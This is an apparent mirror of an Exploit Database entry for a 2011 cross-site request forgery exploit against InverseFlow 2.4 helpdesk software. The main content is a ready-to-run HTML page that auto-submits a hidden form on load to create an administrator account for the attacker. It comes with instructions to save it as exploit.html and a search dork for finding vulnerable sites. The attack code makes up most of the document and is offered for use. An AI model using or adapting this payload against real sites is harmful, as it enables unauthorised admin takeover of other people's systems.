InverseFlow 2.4 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 107 阅读

• 作者： EjRaM HaCkEr
  日期： 2011-10-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18022/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74

  #(+) Exploit Title: InverseFlow v2.4 CSRF Vulnerabilities (Add Admin User)   #(+) Version : 2.4   #(+) Author: EjRaM HaCkEr   #(+) Contact : m2z()9.cn   #(+) Dork: inurl:"ticket.php?cmd=lost" #(+) Software Link : http://asria.info/download/script/inverseflow.zip     0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1     # All you have to do is save the below code as exploit.html   # will automatically add the attacker as Admin without warning ;)   # The password will be sent automatically to email ;)       Code:       <html> <head> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> var pauses = new Array( "2360" );   function pausecomp(millis) { var date = new Date(); var curDate = null;   do { curDate = new Date(); } while(curDate-date < millis); }   function fireForms() { var count = 1; var i=0;   for(i=0; i<count; i++) { document.forms[i].submit();   pausecomp(pauses[i]); } }   </script> <form method="POST" name="form0" action="http://localhost/support/user.php"> <input type="hidden" name="cmd" value="add"/> <input type="hidden" name="name" value="ejram hacker"/> <input type="hidden" name="email" value="ejram@gmail.com"/> </form>   </body> </html>   ########################################################################   (+)Exploit Coded by: EjRaM HaCkEr   (+)Gr33ts to : tryag.cc + r00t-s3c.com + v99x.com :)   ########################################################################